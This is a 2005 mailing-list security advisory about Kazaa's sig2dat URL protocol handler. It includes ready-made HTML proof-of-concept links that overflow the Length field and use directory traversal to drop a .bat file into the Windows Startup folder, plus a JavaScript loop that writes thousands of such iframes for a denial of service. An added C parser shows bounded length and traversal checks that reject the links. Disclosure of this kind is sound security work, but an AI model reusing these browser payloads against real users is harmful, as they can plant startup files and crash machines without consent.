[VulnWatch] Kazaa Sig2Dat Protocol Remote Integer Overflow and Denial Of Service by creating files in arbitrary locations

From: Rafel Ivgi, The-Insider (theinsider_at_012.net.il)
Date: 01/17/05

    Date: Mon, 17 Jan 2005 22:40:47 +0200
    To: Windows NTBugtraq Mailing List <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>, vulnwatch@vulnwatch.org, "securitytracker.com" <bugs@securitytracker.com>, news@securiteam.com, full-disclosure@lists.netsys.com, bugtraq@securityfocus.com
    
    

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Application: Kazaa
    Vendors: http://www.kazaa.com
    Versions: Kazaa Lite K++ (probably all others too...)
    Platforms: Windows
    Bug: Sig2Dat Protocol Remote Integer Overflow and Denial Of Service by
         creating files in arbitrary locations
    Exploitation: Remote With Browser
    Date: 17 Jan 2005
    Author: Rafel Ivgi, The-Insider
    E-Mail: the_insider@mail.com
    Website: http://theinsider.deep-ice.com

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    1) Introduction
    2) Bugs
    3) The Code

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===============
    1) Introduction
    ===============

    Kazaa is currently the world's most common P2P file sharing application.
    Installing Kazaa registers a new URL protocol handler named "sig2dat".
    This handler contains an integer overflow vulnerability which may cause
    a crash and may allow remote execution of code. There is a second
    vulnerability in the "File:" parameter which allows creating files in
    arbitrary locations and causing a Denial of Service.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    =======
    2) Bugs
    =======

    The sig2dat link syntax (as used in the examples below; %7C is the
    URL-encoded "|" field separator):
    sig2dat://%7CFile:<filename>%7CLength:<file length in bytes>%20Bytes,<file length in kilobytes>KB%7CUUHash:=<HASH>%7C/

    The vulnerable parameter is the file "Length" (in bytes): specifying a
    numeric value bigger than 999999999 triggers the overflow.

    Successful exploiting of this vulnerability may allow remote code execution.

    There is another vulnerability in the "File:" parameter. It allows creation
    of files in arbitrary locations within the same partition as the shared
    folder, using the classic directory traversal technique "../".

    For example:
    <A HREF="sig2dat://%7CFile:../../../../../../Docume~1/All Users/Start Menu/Programs/Startup/cool.bat%7CLength:373236528%20Bytes,364489KB%7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK HERE</A>

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===========
    3) The Code
    ===========

    1) Integer overflow: oversized "Length" value
    <A HREF="sig2dat://%7CFile:dev-catz5%28.bin%7CLength:999999999999999999999999999%20Bytes,364489KB%7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK HERE</A>
    *********************************************************************
    2) Directory traversal: drop a file into the All Users Startup folder
    <A HREF="sig2dat://%7CFile:../../../../../../Docume~1/All Users/Start Menu/Programs/Startup/cool.bat%7CLength:373236528%20Bytes,364489KB%7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK HERE</A>
    *********************************************************************
    3) Denial of Service: the traversal link repeated from script, one iframe
       per file (cool1.bat ... cool9999.bat)
    <script>
    var i;
    var mylocation;
    for (i = 1; i < 10000; i++)
    {
        // Each iframe triggers the sig2dat handler once, creating a new file.
        mylocation = "<iframe src='sig2dat://%7CFile:../../../../../../Docume~1/All Users/Start Menu/Programs/Startup/cool" + i + ".bat%7CLength:373236528%20Bytes,364489KB%7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/'></iframe>";
        document.write(mylocation);
    }
    </script>
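    The following is an added example written for this page; it is not code
    from the advisory, from its author, or from Kazaa. It parses the sig2dat
    link layout used in the examples above (File, Length, UUHash fields
    separated by "|") and shows both issues the advisory describes side by
    side: an unchecked 32-bit accumulation of the Length digits, which wraps
    silently on an oversized value, next to a bounded parse using strtoull
    with an ERANGE check, plus a component-wise check that rejects "..", "."
    and absolute paths in the File field. The 999999999-byte bound is the
    threshold the advisory quotes, not a value taken from Kazaa; the three
    sample links are constructed inputs (the advisory's two proof-of-concept
    links, unwrapped, and one well-formed link for comparison).

```c
/* Added example (not from the advisory or from Kazaa): sig2dat link parser
 * with an unchecked Length parse beside a bounded one, and a traversal
 * check on the File field.  Assumptions: field layout as in the advisory's
 * example links; MAX_LENGTH_BYTES is the advisory's quoted threshold. */
#include <ctype.h>
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_LENGTH_BYTES 999999999ULL   /* threshold quoted in the advisory */

/* Constructed inputs: the advisory's two PoC links (unwrapped) and a benign one. */
static const char POC_OVERFLOW[] =
    "sig2dat://%7CFile:dev-catz5%28.bin%7CLength:999999999999999999999999999"
    "%20Bytes,364489KB%7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/";
static const char POC_TRAVERSAL[] =
    "sig2dat://%7CFile:../../../../../../Docume~1/All Users/Start Menu/Programs/"
    "Startup/cool.bat%7CLength:373236528%20Bytes,364489KB%7CUUHash:="
    "DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/";
static const char BENIGN[] =
    "sig2dat://%7CFile:song.mp3%7CLength:4194304%20Bytes,4096KB"
    "%7CUUHash:=AAAAAAAAAAAAAAAAAAAAAAAAAAA=%7C/";

/* Percent-decode src into dst; dst needs at least strlen(src)+1 bytes. */
static void pct_decode(const char *src, char *dst) {
    while (*src) {
        if (src[0] == '%' && isxdigit((unsigned char)src[1]) && isxdigit((unsigned char)src[2])) {
            char hex[3] = { src[1], src[2], 0 };
            *dst++ = (char)strtol(hex, NULL, 16);
            src += 3;
        } else {
            *dst++ = *src++;
        }
    }
    *dst = 0;
}

/* Unchecked parse: digits accumulated into a 32-bit unsigned with no bound,
 * so a value past 2^32 wraps silently (4294967297 comes back as 1). */
uint32_t parse_length_unchecked(const char *digits) {
    uint32_t v = 0;
    while (isdigit((unsigned char)*digits))
        v = v * 10u + (uint32_t)(*digits++ - '0');   /* wraps modulo 2^32 */
    return v;
}

/* Bounded parse: strtoull + ERANGE, the field must end at ' ' (" Bytes,...")
 * or NUL, and the value must not exceed the advisory's threshold. */
int parse_length_checked(const char *digits, uint64_t *out) {
    char *end;
    errno = 0;
    unsigned long long v = strtoull(digits, &end, 10);
    if (end == digits || errno == ERANGE) return 0;
    if (*end != ' ' && *end != 0) return 0;
    if (v > MAX_LENGTH_BYTES) return 0;
    *out = v;
    return 1;
}

/* Reject anything that can leave the shared folder: absolute paths, drive
 * letters, empty components, and "." or ".." under either separator. */
int file_name_is_safe(const char *name) {
    if (name[0] == 0 || name[0] == '/' || name[0] == '\\') return 0;
    if (isalpha((unsigned char)name[0]) && name[1] == ':') return 0;
    const char *p = name;
    while (*p) {
        const char *start = p;
        while (*p && *p != '/' && *p != '\\') p++;
        size_t n = (size_t)(p - start);
        if (n == 0 || (n <= 2 && strspn(start, ".") == n)) return 0;
        if (*p) p++;
    }
    return 1;
}

/* Parse "sig2dat://|File:<name>|Length:<bytes> Bytes,<kb>KB|UUHash:=<hash>|/".
 * Returns 1 if the link passes both checks, 0 otherwise; *why names the result. */
int parse_sig2dat(const char *url, char *file, size_t file_sz, uint64_t *length, const char **why) {
    char buf[1024];
    if (strlen(url) >= sizeof buf) { *why = "too long"; return 0; }
    pct_decode(url, buf);
    if (strncmp(buf, "sig2dat://", 10) != 0) { *why = "not sig2dat"; return 0; }
    char *f = strstr(buf, "|File:");
    char *l = strstr(buf, "|Length:");
    char *h = strstr(buf, "|UUHash:");
    if (!f || !l || !h || !(f < l && l < h)) { *why = "missing field"; return 0; }
    *l = 0; *h = 0;           /* terminate the File and Length fields in place */
    f += 6; l += 8;
    if (!file_name_is_safe(f)) { *why = "path traversal"; return 0; }
    if (!parse_length_checked(l, length)) { *why = "length out of range"; return 0; }
    snprintf(file, file_sz, "%s", f);
    *why = "ok";
    return 1;
}

int main(void) {
    const char *links[] = { POC_OVERFLOW, POC_TRAVERSAL, BENIGN };
    for (size_t i = 0; i < 3; i++) {
        char file[256]; uint64_t len = 0; const char *why;
        int ok = parse_sig2dat(links[i], file, sizeof file, &len, &why);
        if (ok) printf("accepted: file=%s length=%llu\n", file, (unsigned long long)len);
        else    printf("rejected: %s\n", why);
    }
    printf("unchecked parse of 4294967297 -> %u\n", parse_length_unchecked("4294967297"));
    return 0;
}
```

    Run stand-alone, the two PoC links are rejected ("length out of range"
    and "path traversal") and the benign link is accepted, while the last
    line shows the unchecked parser turning 4294967297 into 1; that wrap is
    the kind of silent truncation an oversized Length value aims at.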

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ---
    Rafel Ivgi, The-Insider
    http://theinsider.deep-ice.com
    "Scripts and Codes will make me D.O.S , but they will never HACK me."
    
